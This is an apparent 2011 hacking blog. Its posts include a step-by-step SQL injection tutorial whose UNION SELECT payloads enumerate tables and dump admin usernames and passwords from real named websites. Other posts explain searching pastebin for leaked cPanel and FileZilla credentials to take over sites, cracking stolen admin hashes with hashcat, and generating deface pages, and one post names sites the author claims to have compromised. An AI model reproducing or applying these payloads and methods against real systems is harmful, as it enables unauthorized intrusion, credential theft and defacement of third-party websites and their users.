Wednesday, September 14, 2011

SQL [TUT]

Posted by KᵃᴵzᵒᴷU─Ō™ | |
0 comments
I have not included tutorial for version less than 4 and blind coz according to me more than 80 % sql injections this way :biggrin:

1. USE DORKS TO FIND SITES

http://f47al3rr0r.net/forum/showthread.php?tid=10

Credits : Biohazard

2.CHECK WHETHER THE SITE IS VULNERABLE

put a ' infront of the page .

if it does not reload in its original format it is vulnerable .

eg.

Nothing is shown on page So it might be possible it is vulnerable

P.S:

P.S:
if you get error like this it is not MYSQL injection it's MSSQL


/ Microsoft Access ODBC driver /

/ Open quotation /

/ Microsoft Amos DB provider for Oracle /

/ Division by zero in /

so find a good MSSQL tutorial

3.FINDING NUMBER OF COLUMNS IN SQL DATABASE

Quote:http://www.pseb.org.pk/page.php?nid=11 ORDER BY 1-- NO ERROR

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 10-- ERROR

SO COLUMN NUMBER IS BETWEEN 1 AND 10

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 5-- ERROR
SO COLUMN NUMBER IS BETWEEN 1 AND 5

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 4-- NO ERROR
SO COLUMNS IN DATABASE IS 4


4:CHECK IF UNION STATEMENT IS WORKING AND FIND VULNERABLE COLUMNS

Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT 1,2,3,4--

watch out for minus i placed before web page number .
we do it so website only returns header and we can see useful information .
see the numbers it is showing on page .
that are the injectable column numbers

5:CHECK DATABASE VERSION

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT @@version,2,3,4--

VERSION 5.0.83 cheers

6:FINDING TABLE NAMES

This sub-section is divided into two parts :

6A:WHEN ALL TABLE NAME IS SHOWED AT ONCE

Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT table_name,2,3,4 from information_schema.tables--

in this case we will see which tables are interesting
tblUsers intrigues me in this case :hehe:

6B:WHEN ONLY ONE TABLE NAME IS SHOWN THAT ALSO SOMETHING LIKE CHARACTER_SETS
here we use limit statements
example :
check this


http://www.medicalmarijuanainformation.c...roupID=-13 union select all table_name from information_schema.tables--


you will get same problem here which i mentioned above.

so your way forward will be

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 0,1--


then

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 1,1--

then

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 2,1--

till

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 17,1--

Use magic quotes trick to find column name along with limit ..

7. FIND COLUMNS IN DATABASE
this sub section has been divided into 2 parts :

7A.FINDING COLUMNS IN A PARTICULAR TABLE

http://www.medicalmarijuanainformation.c...roupID=-13 union all select column_name from information_schema.columns where table_name='adminusers' limit 0,1--
here only one column name is displaying so i am using limit statement otherwise it would be unnecessary .
It only works if MAGIC QUOTES is off .
single quotes i placed table name is important .
IF IT doesn't work it try hexing the table name .
Google to find a hex converter and put in table name there and get it's hex .

7B.FINDING ALL COLUMN NAMES

Quote:http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT COLUMN_NAME,2,3,4 from information_schema.COLUMNS--


If only one column name is displaying then use the limit statement like shown above

8.DISPLAYING USER NAMES AND PASSWORDS
0x3a is hex form of ":".

http://www.medicalmarijuanainformation.c...roupID=-13 union all select group_concat(adminID,0x3a,adminUsername,0x3a,adminPassword) from adminusers --

Quote:http://www.pseb.org.pk/page.php?nid=-11 union all select concat(user_id,0x3a,password,0x3a,email),2,3,4 from tblUsers --


cracking hash , finding the hash type , finding admin page etc are out of scope of this tutorial .
Read More

Beginner freindly

Posted by KᵃᴵzᵒᴷU─Ō™ | |
0 comments
I've been searching for days of the best way to get information for a few sites and FileZilla information and I've found the easiest way to get most site(s) information.

In this tutorial I will share a way that I've got four websites for my team "Team Ownage", I will also give you the deface if wanted, I've got the following websites from this hacking way;
http://payingeveryday.com/
http://joomlachat.org
http://www.osninjas.info/
http://tonrak.net/

This way might of been released before but I've got the way of getting a 99.9% of a receiving information, I've found information for hundreds of things but this way does have complications, once this thread gets posted loads of users will be doing this so it'll be patched very quickly, I will be looking for way more ways of doing this with better websites.

Now let's get to the way of this lovely hack, go to http://pastebin.com, head over to the search button and search the following information from the list below;

"Cpanel Info"
"FileZilla Info"
"Minecraft Info"
"2083 info"
All of those give you a 99.9% of chance getting a website, it may take time getting a working website since loads of users might be doing this so don't expect it to work. Please don't use the "" only the information between it.

I hope this helps those users that cannot be asked to read the basics or are totally retarded(not mentioning anyone just saying), this took me around 3 days to get all the information and if you'll just take time to say thank you or even +rep me(if wanted, not asking don't need) I'll be grateful, I hope you all enjoy this.
IP Address: Logged
Read More

GodMode Windows 7

Posted by KᵃᴵzᵒᴷU─Ō™ | |
0 comments
It is very simple and useful. With that you can see all applications witch are important on windows. Simply create a new folder and rename it to

Code:
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
Read More

How to crack a Hash

Posted by KᵃᴵzᵒᴷU─Ō™ | |
0 comments

~How to crack a Hash~



First if you hack some website and get crypted admin password and you don't know what kind of password you get, I suggest you first to read this thread: Hash Types - Must See and you will cracking program. I Recommend you hashcat. Hashcat is advanced password recovery software, It can work on Windows as on Linux, it can crack next hash with these algorithms: 
Code:
MD5
    md5($pass.$salt)
    md5($salt.$pass)
    md5(md5($pass))
    md5(md5(md5($pass)))
    md5(md5($pass).$salt)
    md5(md5($salt).$pass)
    md5($salt.md5($pass))
    md5($salt.$pass.$salt)
    md5(md5($salt).md5($pass))
    md5(md5($pass).md5($salt))
    md5($salt.md5($salt.$pass))
    md5($salt.md5($pass.$salt))
    md5($username.0.$pass)
    md5(strtoupper(md5($pass)))
    SHA1
    sha1($pass.$salt)
    sha1($salt.$pass)
    sha1(sha1($pass))
    sha1(sha1(sha1($pass)))
    sha1(strtolower($username).$pass)
    MySQL
    MySQL4.1/MySQL5
    MD5(Wordpress)
    MD5(phpBB3)
    MD5(Unix)
    SHA-1(Base64)
    SSHA-1(Base64)
    SHA-1(Django)
    MD4
    NTLM
    Domain Cached Credentials
    MD5(Chap)
    MSSQL
    SHA256
    MD5(APR)
    SHA512
    SHA-512(Unix)

Download Link: Hashcat Advanced password recovery


The download is adbove on website. When you download it and extract you will find two files: hashcat-gui32 and hashcat-gui64. Depends on what system you have x64 or x86 you will chose between those. When you chose and open one of that you will be asked what hardware device you like to use. I recommend you to use NVIDIA but you can crack with CPU too. It depends on your PC configuration. Now open a new document in notepad and paste the your hash and save it. Now back top hashcat and follow instructions by numbers

[1] - Here you load your .txt file with your hash inside 
[2] - Chose mode to crack password. You can use Tables or Combination but I think that Brute force is almost guarantied.
[3] - Chose your hash type, repeat if you don't know what is it read this Hash Types - Must See
[4] - Set length of password, here you must guess it. Bigger password longer cracking
[5] - What Charset (words) will be used for password. If you can add your custom if you want, like: !@#$%^&*()_+-ABCDEFG.....
[6] - Finally click start and cracking should begin. The new black command-promt screnn should appear and that means that cracking is in progress. If you want periodically you can press Enter to see the progress of cracking.
Read More

Sunday, August 28, 2011

Deface Page Generator

Posted by KᵃᴵzᵒᴷU─Ō™ | |
0 comments


A call little program that will make the deface page for you, yuou just enter the text you want.

For an example of how it looks visit:

http://www.hakforums.net/deface.html

Download:

http://www.2shared.com/file/1fDDaO0_/Def...e_Gen.html
Read More
Subscribe to: Posts (Atom)